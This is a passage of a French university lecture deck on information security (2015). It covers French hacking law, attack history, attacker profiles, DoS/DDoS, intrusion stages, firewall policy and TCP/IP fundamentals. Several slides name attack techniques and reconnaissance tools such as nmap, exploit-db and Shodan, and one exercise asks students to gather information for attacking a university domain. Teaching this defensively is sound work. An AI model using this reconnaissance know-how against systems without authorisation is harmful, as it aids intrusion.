Nothing Special   »   [go: up one dir, main page]

Sécurité Informatique PDF

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 351

Sécurité Informatique

Fabrice Prigent

20 mars 2015

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 1 / 351


”Tu es fort petit, très fort, mais tant que je serais
dans le métier, tu ne seras jamais que le second.”
The MASK

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 2 / 351


Pirater n’est pas un jeu

Ce que vous apprendrez ici est destiné à la protection, pas à


l’attaque. Mais si cela vous amuse :
Certains organismes ”anodins” sont sous la protection de la
DGSI ou pire...
Quand vous réussissez à pirater un organisme c’est parce que
Il ne fait pas de sécurité
Il a une bonne sécurité, mais avec une faille. Il a donc des
journaux qu’il analyse.
Accord international G8-24
Gel de situation de police à police,
Regularisation judiciaire par la suite.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 3 / 351


Dura Lex Sed Lex

Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions ”possibles”.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 4 / 351


Dura Lex Sed Lex : résumé

Pour résumer
”Pas vu, Pas pris
Vu : Niqué !”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 5 / 351


Phrases essentielles

”Some rules can be bent,others.... can be broken.”Morpheus


”Ne pas croire ce que l’on te dit. Toujours re-vérifier” Gibbs
règle n°3
”Ne jamais rien prendre pour acquis” Gibbs règle n°8
”L’homme intelligent résoud les problèmes, l’homme sage les
évite”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 6 / 351


Qu’est-ce que la sécurité informatique ?

Protéger l’informatique ?
Intégrité ?
Confidentialité ?
Disponibilité ?
Empêcher les accès aux utilisateurs ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 7 / 351


En-êtes vous sûrs ?

Fake-mail du PDG ?
Notion d’image
Perte de marchés
Et pourtant aucun ”risque informatique”
Mais on peut réduire le risque informatiquement
Vol / Destruction d’un serveur ?
Protection physique (est-ce votre rôle ?)
Sauvegarde

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 8 / 351


La bonne définition

Protéger l’entreprise
Y compris sa version non informatique
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 9 / 351


Comment faire

Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 10 / 351


Evaluer

Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 11 / 351


Les difficultés

Génère des désagréments


L’empêcheur de surfer en rond.
Beaucoup de travail
Des mois de préparation,
Au minimum 1 heure par jour en maintenance.
Nécessite de fortes compétences
en réseau, en système, en droit, et une remise à niveau
permanente
Coûte de l’argent
et ne rapporte rien
Pas de reconnaissance
Si ça marche : ”A quoi ça sert ?”
Sinon : ”Vous êtes nuls !”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 12 / 351


Le contexte : Internet

Historique
Connexion de bout en bout
Réseau ouvert

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 13 / 351


Historique

1962 : Réseau militaire


1968 : Premiers tests réseau à paquets
1 Octobre 1969 Arpanet(RFC,UNIX)
Septembre 1978 : IPv4
1991 : Création de WWW par Tim Lee Werners
1992 : Découverte d’Internet par le grand public

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 14 / 351


Connexion de bout en bout

les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 15 / 351


Réseau ouvert

Entraide : prêt de ressources


Sendmail => relayage de spams
DNS => saturation de serveurs distants
Assistance au débogage
EXPN et VRFY de sendmail => collecte d’informations
XFER DNS => cartographie de réseaux

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 16 / 351


Les risques

Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 17 / 351


Destruction de données

Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 18 / 351


Perte de marché

Vol ou divulgation d’information


Recherche et développement
Fichier client
Dégradation de l’image
Modification du site web
Divulgation d’informations (vraies puis fausses)
Perte de confiance

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 19 / 351


Perte de temps et donc d’argent

Arrêt de la production
Recherche des causes
Remise en état

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 20 / 351


Risques juridiques

Lois françaises
Echanges illégaux (terrorisme/pédopornographie/p2p),
Attaques par rebond,
Confidentialité des données personnelles,
Les banques portent désormais plainte contre les sites de
phishing.
Article 226-17 et Article 226-34 (CNIL).
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 21 / 351


Les menaces : attaques

Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 22 / 351


Les attaques : pré-historique

1975 : Jon Postel pressent le SPAM


=> 1983 : blagues de potaches
1983 : Wargames
Août 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.
(0.75$)
2 Novembre 1988 : Ver de Morris
10% du parc mondial (6000 sur 60000)
Création du CERT

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 23 / 351


Les attaques : historique

2001 : Code Rouge


24 janvier 2003 : Slammer
(376 octets)
doublait toutes les 2,5 secondes
90% des hôtes vulnérables infectés en 10 minutes
2004 : Location de zombies
2008 : Les Anonymous commencent leurs attaques

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 24 / 351


Les attaques : contemporain

2009 : Conficker (7%, Militaire, 250 K$, MD6)


2010 : Opération Aurora, Mariposa (13 M), Comodo, Stuxnet,
etc.
2011 : Affaire DigiNoTar (certificat *.google.com),
2012 : Pacemakers, Piratage de l’élysée,
2013 : PRISM (Snowden), Backdoor DLink

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 25 / 351


Les attaques : 2014

DDOS NTP
Généralisation des cryptolockers
25 Septembre : ShellShock (1998) http://fr.wikipedia.
org/wiki/Shellshock_(faille_informatique)
Piratage de Sony
Piratage/Rançon Domino Pizza
Groupe FIN4 (espionnage Bourse)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 26 / 351


Les attaques : les thèmes 2014

Failles SSL
Mars : Heartbleed (Mars 2012)
http://fr.wikipedia.org/wiki/Heartbleed
Faille SSLv3(Poodle)
SSL Mac
GnuTLS
Attaques étatiques
Sandsworm (Russie)
Chine MitM iCloud
Malware Regin(début 2006) spécialisé sur GSM
AuroraGold (NSA GSM/Chiffrement)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 27 / 351


Les attaques : 2015

Poivre du Sichuan
Cyberdjihadisme de masse
3 failles 0day en 1 semaine sur flash player

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 28 / 351


Poivre du Sichuan : UT1

RRDTOOL / TOBI OETIKER


Quarantaine hebdomadaire
700

600

500

400

300

200

100

jeu. ven. sam. dim. lun. mar. mer.


Quarantaine en sortie par heure Quarantaine en entree par heure

03 Février 11 heures : 13747


04 Février 11 heures : 96265

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 29 / 351


Cyberdjihadisme

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 30 / 351


Les attaques : en temps réel

http://map.honeynet.org

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 31 / 351


Les attaques : en temps réel 2

http:
//cybermap.kaspersky.com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 32 / 351


Les attaques : en temps réel 3

http:
//zone-h.org
Fabrice Prigent Sécurité Informatique/ 20 mars 2015 33 / 351
Niveau des attaques

Niveau

Fast Flux

Phishing Crypto High tech

Attaques distribuées Réseau C&C P2P


Attaques web
Interface graphique
Obfuscation
Maquillage de paquets Déni de service

Exploration de réseau (scan) Techniques furtives

Utilisation de SNMP

Désactivation des journaux


Détournement de sessions

Backdoor

Exploitation de vulnérabilités connues


Décryptage de mot de passe
Code Auto-répliquant

Essai de mots de passe

1980 1985 1990 1995 2005 2010 2015

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 34 / 351


Type des attaquants : par compétence

Script Kiddies
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers et techniques)
0days possibles.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 35 / 351


Type des attaquants : par objectif

Scammer
piratage volumétrique
cryptolocker ”killer application”
Hacktiviste
”Terroriste”
Anonymous
Espions
Etatique
Industriel
”Petit con”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 36 / 351


Evolution des attaquants

Ne pas se méprendre
La moyenne des pirates est plus bête qu’avant.
Mais les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques (Ingénieurs au chomage après éclatement de la
bulle internet)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 37 / 351


But des attaques

Constitution d’un parc de zombies


Campagne de SPAMs
Campagne de phishing
Campagne de racket
Tag
Casse
Vol (codes bancaires, espionnage, marketing agressif)
Spyware, Keylogger, etc.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 38 / 351


Economie Virale

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 39 / 351


Economie Virale : quelques chiffres

Faille inconnue : 80000 e


30% des américains ont acheté après un spam
ROI de ”indian herbal” 0,1 cents pour 65 e
Vol d’identité
Perte estimée pour le vol d’une identité : 400 e(bénéfice pour
le pirate : entre 50 et 100 e))
en 2007, l’estimation des pertes dues à la cybercriminalité était
de plus de 1 milliard par an.
Depuis 2007 C.A. cybercriminalité > C.A. drogue

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 40 / 351


Proposition d’emploi

Mais
actuellement les machines résolvent 99% des captchas.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 41 / 351


Type des attaques

Déni de service (saturation, D.O.S. ou D.D.O.S.)


Intrusion
Interception
Usurpation (phishing, nom de domaine décalé, etc.)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 42 / 351


Attaque D.O.S.

Deny Of Service ou Déni de service. Plusieurs principes de


fonctionnement
Le harcèlement
Occupation permanente de la ligne
Le livreur de pizzas
Appel de plusieurs livreurs pour une fausse adresse
Voir backscatter pour le repérage
Le chewing gum dans la serrure

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 43 / 351


Attaque D.D.O.S.

Distributed Deny Of Service ou déni de service distribué.


D.O.S. appliqué par plusieurs (dizaines de milliers de)
machines
Généralement de type ”livreur de pizzas”
Rarement évitable (même par des sociétés spécialisées)
Exemple du 7ème spammeur avec 8Gbit/s en 2006.
Volume maximal actuel : 400 Gbit/s en NTP (300 GBit/s
contre Spamhaus en 2013)
http://atlas.arbor.net/summary/do

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 44 / 351


Type de D.O.S.

Saturation de la bande passante (UDP)


10000 zombies
Impossible de lutter
Saturation de la table des connexions (TCP)
1000 zombies
Lutte : utilisation des syncookies
Saturation du nombre processus
100 zombies mais les machines sont ”grillées”, connaissance
minimale
Lutte : limitation du nombre de processus, repérage et blocage
très tôt

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 45 / 351


Type de D.O.S.

Saturation de la CPU
10 zombies mais les machines sont ”grillées”, connaissances
pointues
Lutte : limitation de la CPU (noyau), mod evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Patch régulier, durcissement noyau, protection applicative

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 46 / 351


Et si kon ve fer mé kon sé pa

source http: // www. ddosservice. com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 47 / 351


Piske ma copine me quitte, je DDoS

source
https: // pasillo. renater.
Fabrice Prigent
fr/ weathermap/ weathermap_
Sécurité Informatique/ 20 mars 2015 48 / 351
La protection DDOS

Elle se prépare
Savoir ce que l’on est prêt à sacrifier (ou pas)
En terme de correspondants
En terme de services
Connaitre les interlocuteurs
Avoir mis en place les procédures
Elle est multi-niveaux
Volumétrique (FAI)
Connexion (Réseau)
Applicative (Développement)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 49 / 351


Déroulement d’une attaque intrusion

Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités => intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 50 / 351


Collecte des informations

Par ”social engineering” ou ingénierie sociale


Par ingénierie informationnelle
Par interrogation TCP/IP
Scan (de ports ou de machines)
Rapide/lent
Classique/furtif
Interrogation des services
Cartographie DNS
Récupération des versions
Récupération des options

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 51 / 351


Attaques : quelques statistiques à l’UT1

Ces chiffres sont des moyennes en 2014-2015


1 intrusion réussie (boite noire) shellshock
40 tests par seconde ( 3 500 000 par jour )
1200 scans par jour (> 3 ports ou 10 machines)
16 à 2000 machines à chaque fois
5 à 10 campagnes de phishings par jour.
51 incidents de sécurité depuis 10 ans dont
9 incidents de phishing
23 virus (sortants) sur des postes
2 intrusions automatiques (vers) sur des serveurs (8 ans)
1 serveur externe piraté
2 DDoS réussis en Février 2015.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 52 / 351


Attaques : nombre mensuel de tests

RRDTOOL / TOBI OETIKER


Infractions sur 1 mois

200

100

0
jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar.

Infractions sortantes par seconde Infractions entrantes par seconde

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 53 / 351


Attaques : nombre d’attaquants

RRDTOOL / TOBI OETIKER


Quarantaine sur un mois
600

500

400

300

200

100

0
mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar.
Quarantaine en sortie par heure Quarantaine en entree par heure

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 54 / 351


Attaques : raisons de la quarantaine sur une journée

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 55 / 351


Pourquoi les services sont vulnérables ?

Mauvaise conception (volontaire ou non)


Peace and Love : REXEC
Bakcdoor : FSP,EGGDrop
Incompétence : WEP
Complexité : OpenSSL, Bash
Mauvaise configuration
Sendmail, DNS, HTTP
Mauvaise utilisation
Scripts php, cgi-bin incorrects
Mauvais utilisateurs
Clickophile
Manque d’intelligence entre la chaise et le clavier

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 56 / 351


Heureusement

C’est super dur de trouver des failles

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 57 / 351


Site de recensement de failles

source http: // www. cvedetails. com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 58 / 351


Heureusement

C’est super dur de trouver comment exploiter des failles

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 59 / 351


Site d’utilisation de failles

source http: // www. exploit-db.


Fabrice Prigent
com
Sécurité Informatique/ 20 mars 2015 60 / 351
Heureusement

Les grosses entreprises ne se font jamais pirater.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 61 / 351


Les plus grosses fuites de données

source http: // www. informationisbeautiful. net

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 62 / 351


Sans compter shodan

http://www.shodanhq.com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 63 / 351


Définir les rôles : politique de sécurité

Que voulez-vous faire ?


Qui fait quoi, comment et quand ?
Les pièges à éviter

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 64 / 351


Que voulez-vous faire ?

Protéger contre la CIA/NSA/GRU ?


Protéger contre des adversaires précis ?
Protéger contre l’interne ?
Protéger contre le ”normal”?
N’oubliez jamais
Vous voulez assurer la survie de votre organisme

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 65 / 351


Qui aura le droit de faire quoi ?

Politique de sécurité
Le web est autorisé pour qui, pour quoi ?
Qui peut utiliser la messagerie ?
Qui définit les règles ?
Qui les annonce et comment ?
Quelles sont les sanctions ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 66 / 351


Les pièges à eviter

Tenter l’impossible
Faire du tout sécuritaire

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 67 / 351


A l’impossible nul n’est tenu

Efficacité

100%

Coût :
●Financier,

0% ●Compétence,

●Désagréments

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 68 / 351


Eviter le tout sécuritaire

Fragilise votre soutien par la DG


Provoque des tentatives de contournements
Préférer empêcher à interdire

Rappel
Votre but est que ”votre organisme fonctionne” pas de concurrencer
Fort Knox

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 69 / 351


Les priorités

Empêcher les agressions (volontaires ou non) : Protection


Repérer les agressions : Détection
Confiner les agressions et limiter leurs conséquences
Accumuler les preuves
Comprendre, apprendre, retenir (itération)
Retour à la normale

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 70 / 351


La protection

Nous parlerons ici de la protection dite périmétrique


Partie la plus efficace
70% à 80% d’attaques en moins (les choses changent)
La moins coûteuse
en temps
en argent
en compétence
La plus stable dans le temps
La plus visible

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 71 / 351


La détection

La détection permet de réagir


Permet de prévoir l’avenir
scan sur des ports inconnus
analyse des comportement anormaux
Permet de justifier les coûts
En présentant correctement les informations

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 72 / 351


Confinement des agressions

”Réactif” en cas d’échec de protection


Protection en profondeur
Doit être placé ”en plus” avant la détection (proactif)
De plus en plus utile avec les vers

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 73 / 351


Accumuler les preuves

Optionnel
En cas de recours en justice
A notre initiative
Mais aussi à notre encontre
Tâche ingrate et rarement effectuée
Réputation
Argent
Temps

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 74 / 351


Comprendre, apprendre, retenir

L’attaque a réussi
Pourquoi ?
Comment y remédier ?
Parer à la faille utilisée
Réfléchir à une généralisation de cette faille

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 75 / 351


Remise en état

Plan de reprise/Plan de secours


Si elle est faite avant de comprendre
Vous ne pourrez apprendre
Vous n’aurez donc rien appris
Vous resubirez l’attaque
Nécessité d’une machine à remonter le temps
Phase rarement testée

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 76 / 351


Collecte des informations : exercices

Exercice 1 : Ingénierie informationnelle


Collecter toute information utile pour attaquer le domaine
univ-tlse1.fr

Exercice 2 : jouons avec nmap


Découvrir les utilisations de NMAP, pour les ports, les applications,
les versions.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 77 / 351


Résolution des problèmes

La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 78 / 351


La tronçonneuse

On enlève l’inutile :
Protection contre l’extérieur ;
Protection contre l’intérieur ;
Protection à l’intérieur.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 79 / 351


Protection contre l’extérieur

Travail effectué par le firewall :


On bloque tout ce qui vient de l’extérieur ;
Hormis ce qui est spécifiquement autorisé ;
Le tout basé sur une notion de port ;
Les entrées sont limitées en rapidité ;
On jette et on n’avertit pas.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 80 / 351


Protection contre l’intérieur

Tout est autorisé en sortie SAUF


Ce qui est offert en interne
DNS, SMTP, NTP, etc.
Ce qui est dangereux pour l’extérieur
SNMP, Netbios, etc.
Ce qui est illégal, non productif
P2P, pédopornographie
Jeux en ligne, pornographie
Les ”zones ouvertes” qui doivent être contrôlées
Show Room
WiFi

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 81 / 351


Protection à l’intérieur

Travail effectué par un filtrage interne. Tout est autorisé en


intra-établissement SAUF
Ce qui est dangereux
Les zones ouvertes
Les zones fragiles doivent être injoignables

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 82 / 351


Le ciseau à bois

On enlève ce que l’on sait dangereux dans ce qui est autorisé


Le courrier électronique
Le Web
Les services en général

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 83 / 351


Le courrier électronique

Le SMTP rentre mais


Il ne rentre pas pour ressortir
Il ne doit pas être vecteur de virus
Il est analysé contre le spam
Il est ralenti s’il est inconnu (greylisting)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 84 / 351


Le Web

Le Web sort mais


Certains sites sont interdits
Les nids à virus sont inspectés
On journalise ce qui passe

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 85 / 351


Les services

Certains services sont offerts, mais


Les serveurs sont patchés
Ils remontent les anomalies
Un détecteur d’anomalies veille
On limite les conséquences des anomalies

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 86 / 351


Le reste

Le reste sort mais


Limitation des débits
On suit les connexions (journaux)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 87 / 351


Le papier de verre

On repère ce qui va être dangereux

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 88 / 351


Les logs sont nos amis

Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 89 / 351


Les actions de salubrité publique

On abat les webmestres !

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 90 / 351


La lazure

On évite que le temps et les intempéries ne nous détruisent la


maison.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 91 / 351


La machine à remonter le temps

On fait des sauvegardes


On vérifie qu’elles fonctionnent
On ne les place pas au même endroit que les serveurs
On vérifie qu’elles pourront toujours fonctionner

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 92 / 351


La dynamo

On met en place la dynamo


E.D.F. en temps de paix : 240 Volts
E.D.F. en temps de grève : 0 Volt
E.D.F. en temps d’orage : 400 Volts
L’onduleur est votre ami. Vous devez l’écouter.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 93 / 351


On ferme à clé

Coût d’un pirate professionnel : 2000 e à 200 000 e


Coût d’une femme de ménage : 100 e la journée
Moralité : fermez les portes.
Post scriptum
Temps moyen pour fracturer une serrure de sécurité ”simple” : 3 à
30 secondes.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 94 / 351


Les protections réseau

Les protections réseau

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 95 / 351


Comment protéger ?

Dans un monde parfait


Bien concevoir les services
Bien configurer les services
Bien les utiliser
Dans le monde réel
Limiter les accès aux services nécessaires
En nombre de machines
En nombre de services
Limiter les conséquences d’une intrusion

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 96 / 351


Mais garder à l’esprit
Une protection périmétrique ne protège pas :
du WiFi
des portables infectés
des applications web infectées

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 97 / 351


D’où l’idée

Séparer les services publics et les services internes


Limiter la communication et la visibilité depuis l’extérieur
Obliger le passage par un point unique de contrôle => Le
pare-feu

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 98 / 351


Les pare-feux

De nombreux noms
Firewall
Garde-Barrières
Gatekeeper
Qu’est-ce que c’est ?
Comment ça marche ?
Evaluer et choisir un pare-feu

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 99 / 351


Les pare-feux

Définition réseaux
Types de pare-feux
Types d’architecture
Critères de choix
Perspectives

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 100 / 351


Politique de sécurité : le firewall

La sortie
Qui ?
Pour quoi ?
L’entrée
Qui ?
Pour quoi ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 101 / 351


Définitions

IP
ICMP
La notion de port
TCP
UDP
Protocoles

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 102 / 351


IP : Internet Protocol

Protocole de communication
Actuellement en version IPv4
IPv6 en cours de déploiement (Free depuis Décembre 2007)
Chaque machine sur Internet a une adresse IP unique
Les paquets se propagent de routeur en routeur
Protocole non fiable mais résistant

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 103 / 351


IP : Internet Protocol

Format d’une adresse


Classes (obsolète)
A : de 1.0.0.0 à 127.255.255.255
B : de 128.0.0.0 à 191.255.255.255
C : de 192.0.0.0 à 223.255.255.255
D : de 224.0.0.0 à 239.255.255.255 (Multicast)
Notion de CIDR
Classless InterDomain Routing
Plus assez de classes C ou B disponibles
193.49.48.0/24 ou 193.49.50.0/23

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 104 / 351


IP : Internet Protocol

Ensemble de diverses adresses non disponibles : RFC3330 (ex


RFC1918)
Adresses privées non routables sur Internet
10.0.0.0/8
172.16.0.0/16 à 172.31.0.0/16
192.168.0.0/24 à 192.168.255.0/24
Adresses spécifiques
127.0.0.0/8
224.0.0.0/4
192.0.2.0/24
169.254.0.0/16
etc.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 105 / 351


IP : Internet Protocol

Longueur Type de service


Version en-tête (TOS) Longueur totale en octets

Identification de fragment flags 13-bit décalage fragment


20 octets
TTL Protocole Somme de Contrôle d ’en-tête

Adresse IP source

Adresse IP destination

Options éventuelles (timestamp, source routing, etc…) X fois

Données

32 bits en codage « big endian »

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 106 / 351


ICMP : Internet Control Message Protocol

Protocole de signalisation
Service/machine/réseau injoignable
Demande de ralentissement
Peut être utilisé pour les attaques
ICMP Redirect
ICMP Echo
Attaque smurf

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 107 / 351


TCP/UDP : La notion de port

Le port est un numéro de 0 à 65535


Lors d’une communication, le serveur et le client ont chacun
un port utilisé
Chaque machine associe une communication à un quadruplet
(IP-C/Port-C/IP-S/Port-S)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 108 / 351


TCP/UDP : La notion de port (2)

Dénomination
Port destination : port du destinataire
Port source : port de l’expéditeur (provenance du paquet)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 109 / 351


TCP/UDP : La notion de port (3)

Les ports sont définis par le IANA (http ://www.iana.org)


De 1 à 1023 : well known ports ( < et > 512)
TCP/23 : telnet
UDP/53 : DNS
de 1024 à 49151 : user (registered) ports
TCP/3128 : Squid
UDP/2049 : NFS
de 49152 à 65535 : dynamics or private ports

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 110 / 351


TCP/UDP : La notion de port (4)

Hormis cas exceptionnel, une communication a lieu entre un port


haut et un port bas
Port du serveur généralement < 1024, toujours < 49152
Port du client toujours supérieur à 1023, parfois >=49152

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 111 / 351


TCP/UDP : Schéma

Client Serveur
65535 65535
… …
49152 49152
49151 49151
… …
1024 1024
1023 1023
… …
1 1

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 112 / 351


TCP : Transport Control Protocol

Protocole connecté
Assure la cohérence de la connexion
A un début et une fin
Un ”triple handshake” initialise la connexion
L’aléa du numéro de séquence n’est pas toujours bon
S’il est prévisible, on peut ”simuler” une connexion

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 113 / 351


TCP : Schéma

Client Serveur
Choix du SYN (1000) Choix du
N° SEQ SYN (2000),ACK(1001) N° SEQ
ACK(2001)
Communication Etablie
Tout paquet possède un ACK

ACK (2300), FIN(1500)


ACK(1501)
ACK(1501),FIN(2300)
ACK(2301)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 114 / 351


UDP :User Datagram Protocol

Protocole non connecté


L’application se débrouille
En cas de désordre
En cas de perte de paquet
Plus rapide
Pas d’attente d’acquittement
Peut être utilisé pour du multicast

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 115 / 351


TCP : Schéma

WWW, FTP, SMTP, etc... DNS, Netmeeting TFTP, SNMP, etc...

TCP (95%) UDP (5%)

ICMP (<1%)

IP

Couche physique (ethernet, ppp, etc...)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 116 / 351


Protocoles applicatifs

Situés au dessus des couches TCP et UDP


Ils ont des ordres spécifiques à leur fonction
Souvent ce sont des ordres ”lisibles”
SMTP (HELO, DATA, MAIL FROM, etc ...)
Plus ou moins complexes
Port unique fixe (http, smtp, pop, dns, ...)
Port(s) dynamique(s) (ftp, irc, h323, ...)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 117 / 351


Protocole simple : HTTP

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion


80
Aléa 1 GET http://…..html HTTP/1.0\n\n
80
Aléa 1 <HTML><HEAD>..</HTML>
80
Aléa 1 Coupure de connexion
80

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 118 / 351


Protocole complexe FTP actif

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1 Etablissement de la connexion 21


Aléa 1 USER ANONYMOUS 21
Aléa 1 331 Enter Password 21
Aléa 1 PASS TOTO@CLIENT.FR 21
